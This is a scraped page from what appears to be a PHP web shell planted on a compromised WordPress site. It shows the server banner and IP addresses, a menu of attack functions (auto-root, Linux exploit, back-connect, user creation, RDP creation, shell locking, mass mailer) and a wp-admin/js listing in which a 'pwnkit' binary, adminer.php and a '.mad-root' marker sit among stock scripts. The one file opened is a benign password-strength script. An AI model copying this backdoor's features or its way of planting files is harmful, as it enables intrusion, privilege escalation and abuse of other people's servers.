Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
tobeuls /
wp-admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
cat.js
556
B
-rwxr--r--
categories.js
658
B
-rwxr--r--
comment.js
897
B
-rwxr--r--
common.js
1.26
KB
-rwxr--r--
custom-fields.js
968
B
-rwxr--r--
dbx-admin-key.js
1.76
KB
-rwxr--r--
edit-comments.js
2.53
KB
-rwxr--r--
editor.js
7.44
KB
-rwxr--r--
forms.js
859
B
-rwxr--r--
gallery.js
684
B
-rwxr--r--
link-cat.js
778
B
-rwxr--r--
link.js
1.7
KB
-rwxr--r--
media-upload.js
1.64
KB
-rwxr--r--
page.js
1.09
KB
-rwxr--r--
password-strength-meter.js
2.52
KB
-rwxr--r--
post.js
6.88
KB
-rwxr--r--
postbox.js
549
B
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
revisions-js.php
2.92
KB
-rwxr--r--
slug.js
1.7
KB
-rwxr--r--
tags.js
547
B
-rwxr--r--
theme-preview.js
1.43
KB
-rwxr--r--
upload.js
12.91
KB
-rwxr--r--
users.js
49
B
-rwxr--r--
widgets.js
4.59
KB
-rwxr--r--
word-count.js
967
B
-rwxr--r--
wp-gears.js
2.69
KB
-rwxr--r--
xfn.js
1.26
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : password-strength-meter.js
// Password strength meter // This jQuery plugin is written by firas kassem [2007.04.05] // Firas Kassem phiras.wordpress.com || phiras at gmail {dot} com // for more information : http://phiras.wordpress.com/2007/04/08/password-strength-meter-a-jquery-plugin/ var shortPass = pwsL10n.short var badPass = pwsL10n.bad var goodPass = pwsL10n.good var strongPass = pwsL10n.strong function passwordStrength(password,username) { score = 0 //password < 4 if (password.length < 4 ) { return shortPass } //password == username if (password.toLowerCase()==username.toLowerCase()) return badPass //password length score += password.length * 4 score += ( checkRepetition(1,password).length - password.length ) * 1 score += ( checkRepetition(2,password).length - password.length ) * 1 score += ( checkRepetition(3,password).length - password.length ) * 1 score += ( checkRepetition(4,password).length - password.length ) * 1 //password has 3 numbers if (password.match(/(.*[0-9].*[0-9].*[0-9])/)) score += 5 //password has 2 sybols if (password.match(/(.*[!,@,#,$,%,^,&,*,?,_,~].*[!,@,#,$,%,^,&,*,?,_,~])/)) score += 5 //password has Upper and Lower chars if (password.match(/([a-z].*[A-Z])|([A-Z].*[a-z])/)) score += 10 //password has number and chars if (password.match(/([a-zA-Z])/) && password.match(/([0-9])/)) score += 15 // //password has number and symbol if (password.match(/([!,@,#,$,%,^,&,*,?,_,~])/) && password.match(/([0-9])/)) score += 15 //password has char and symbol if (password.match(/([!,@,#,$,%,^,&,*,?,_,~])/) && password.match(/([a-zA-Z])/)) score += 15 //password is just a nubers or chars if (password.match(/^\w+$/) || password.match(/^\d+$/) ) score -= 10 //verifing 0 < score < 100 if ( score < 0 ) score = 0 if ( score > 100 ) score = 100 if (score < 34 ) return badPass if (score < 68 ) return goodPass return strongPass } // checkRepetition(1,'aaaaaaabcbc') = 'abcbc' // checkRepetition(2,'aaaaaaabcbc') = 'aabc' // checkRepetition(2,'aaaaaaabcdbcd') = 'aabcd' function checkRepetition(pLen,str) { res = "" for ( i=0; i<str.length ; i++ ) { repeated=true for (j=0;j < pLen && (j+i+pLen) < str.length;j++) repeated=repeated && (str.charAt(j+i)==str.charAt(j+i+pLen)) if (j<pLen) repeated=false if (repeated) { i+=pLen-1 repeated=false } else { res+=str.charAt(i) } } return res }
Close